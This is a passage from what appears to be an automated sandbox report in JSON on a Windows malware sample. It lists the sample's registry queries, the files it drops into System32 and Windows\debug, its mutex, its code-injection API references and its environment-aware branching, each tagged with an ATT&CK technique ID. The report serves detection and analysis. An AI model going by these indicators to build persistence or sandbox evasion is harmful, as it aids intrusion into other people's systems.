\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" queries basic process information of the \"C:\\Windows\\Globalization\\Sorting\\SortDefault.nls\" (UID: 5684)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\Debug\\xmlDown.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\wsock32.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\wsock32.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\Debug\\xmlDown.ENU\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\Debug\\xmlDown.EN\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\debug\\XMLDOWN.ENU\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" trying to access non-existent file \"C:\\Windows\\debug\\XMLDOWN.EN\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\IYAIL.BAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" touched file \"C:\\Windows\\System32\\xmloder.exe\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" touched file \"C:\\Windows\\debug\\xmlDown.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" writes file \"c:\\windows\\system32\\xmloder.exe\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" writes file \"c:\\windows\\debug\\xmldown.dll\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" writes file \"%windir%\\system32\\xmloder.exe\"\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" writes file \"%windir%\\debug\\xmldown.dll\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\regedit.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xmloder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\xmloder.exe]- [targetUID: 00000000-00005684]\n \"xmlDown.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\debug\\xmlDown.dll]- [targetUID: 00000000-00005684]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Makes a code branch decision directly after an API that is environment aware\n Matched sigs: Able to identify virtual environment by using user activity (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp\")\n Found PE header \"MZ\" - Source: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4239496'}\" (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"FindResourceA\" with parameter \"4211216\" - (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryW\" (Indicator: \"GetWindowsDirectory\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetWindowsDirectoryW\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetVersion\" (Indicator: \"GetVersion\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoA\" (Indicator: \"GetLocaleInfo\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000d6383c006b213c003cf6120098213c00f0f51200c8b03d001d000000e8853c00f8f5120010000000c8b03d001d000000e8853c00ec323c001500000056353c0015000000ae353c0001813c00babe3c003cf6120075353c0048f612005c048401c8b03d001d00000015000000b9c43c00 (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"OpenMutexA\" with parameter \"Csutex\" - (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LEVELS\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"DEFAULTLEVEL\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"SAFERFLAGS\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"POLICYSCOPE\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"LOGFILENAME\")\n \"cmd.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, "relevance": 1, "name": "Contains ability to query the machine version", "description": "GetVersion@KERNEL32.DLL at 00000000-00005684-5009-316-00403607", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersion@KERNEL32.DLL directly followed by \"cmp eax, 80000000h\" and \"je 004036A9h\" at 00000000-00005684-5009-316-00403607", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00005684-00000C29-49007942\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-194", "type": 2, "relevance": 1, "name": "Contains ability to enumerate volumes (API string)", "description": "Found reference to API \"FindNextVolumeW\" (Indicator: \"FindNextVolume\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"FindNextVolumeW\" (Indicator: \"FindNextVolume\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetStartupInfoW\" (Indicator: \"GetStartupInfo\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetKeyboardType\" (Indicator: \"GetKeyboardType\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": 